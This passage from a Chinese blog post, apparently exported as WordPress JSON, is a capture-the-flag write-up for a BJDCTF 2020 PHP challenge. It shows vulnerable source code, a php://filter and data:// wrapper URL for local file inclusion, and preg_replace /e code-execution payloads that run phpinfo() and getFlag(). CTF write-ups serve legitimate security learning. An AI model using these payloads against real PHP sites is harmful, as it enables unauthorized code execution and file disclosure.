<?php\n\nerror_reporting(0);\n$text = $_GET["text"];\n$file = $_GET["file"];\nif(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){\n echo "<br><h1>".file_get_contents($text,'r')."<\/h1><\/br>";\n if(preg_match("\/flag\/",$file)){\n die("Not now!");\n }\n\n include($file); \/\/next.php\n\n}\nelse{\n highlight_file(__FILE__);\n}\n?><\/code><\/pre>\n\u4f7f\u7528\u4f2a\u534f\u8bae\u83b7\u53d6next.php\u5185\u5bb9\uff1a\nhttp:\/\/node4.anna.nssctf.cn:28780\/?text=data:\/\/plain\/text,I have a dream&file=php:\/\/filter\/read=convert.base64-encode\/resource=next.php<\/code><\/pre>\n![\"image-20240423171322547\"](\"http:\/\/img.danielw.top\/image-20240423171322547.png\")
<\/p>\n
\u8fdb\u884cbase64\u89e3\u7801\uff1a<\/p>\n
![\"image-20240423171406690\"](\"http:\/\/img.danielw.top\/image-20240423171406690.png\")
<\/p>\n
\u53d1\u73b0\u5b58\u5728preg_replace \/e<\/code>\u6a21\u5f0f\u4e0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e<\/p>\n\u901a\u8fc7 foreach \u4f20\u53c2\u7ed9 complex \u51fd\u6570\uff0c preg_replace\u5728\/e\u60c5\u51b5\u4e0b\u5b58\u5728\u6f0f\u6d1e\uff0c\u5339\u914d\u6210\u529f\u5219\u89e3\u6790\u7136\u540e\u66ff\u6362\u3010preg_replace\u4f7f\u7528\u4e86 \/e<\/strong> \u6a21\u5f0f\uff0c\u5728\u8be5\u51fd\u6570\u7684\u7b2c\u4e00\u4e2a\u548c\u7b2c\u4e09\u4e2a\u53c2\u6570\u90fd\u662f\u53ef\u63a7\u7684\uff0c\u5b98\u65b9 payload \u4e3a\uff1a\/?.*={${phpinfo()}}<\/strong>\uff0c\u5373GET\u65b9\u5f0f\u4f20\u5165\u7684\u53c2\u6570\u540d\u4e3a \/?.*<\/strong> \uff0c\u503c\u4e3a {${phpinfo()}}<\/strong>\uff0c\u4f46\u662f\u5728PHP\u4e2d\uff0c\u5bf9\u4e8e\u4f20\u5165\u7684\u975e\u6cd5\u7684 $_GET \u6570\u7ec4\u53c2\u6570\u540d\uff0c\u4f1a\u5c06\u5176\u8f6c\u6362\u6210\u4e0b\u5212\u7ebf\uff0c\u5bfc\u81f4\u6211\u4eec\u6b63\u5219\u5339\u914d\u5931\u6548\u5219\uff0c\u73b0\u5728\u8981\u505a\u7684\u5c31\u662f\u6362\u4e00\u4e2a\u6b63\u5219\u8868\u8fbe\u5f0f\uff0c\u8ba9\u5176\u5339\u914d\u5230 {${phpinfo()}}<\/strong>\u5373\u53ef\u6267\u884cphpinfo\u51fd\u6570\u3002\u8fd9\u91cc\u63d0\u4f9b\u4e00\u4e2apayload \uff1a\\S*=${phpinfo()}<\/strong>\u3011<\/p>\n\u83b7\u53d6flag\uff1a\/next.php?\\S*=${getFlag()}&&cmd=phpinfo();<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"[BJDCTF 2020]ZJCTF\uff0c\u4e0d\u8fc7\u5982\u6b64 \u901a\u8fc7\u6e90\u7801\uff0c\u9996\u5148\u8981\u83b7\u53d6next.php\u7684\u5185\u5bb9\uff0c\u8fd9\u91cc\u4f7f\u7528php\u4f2a\u534f\u8bae\u8fdb\u884c\u8bfb\u53d6\uff1b < …","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-343","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/343","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=343"}],"version-history":[{"count":1,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/343\/revisions"}],"predecessor-version":[{"id":344,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/343\/revisions\/344"}],"wp:attachment":[{"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=343"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=343"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=343"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}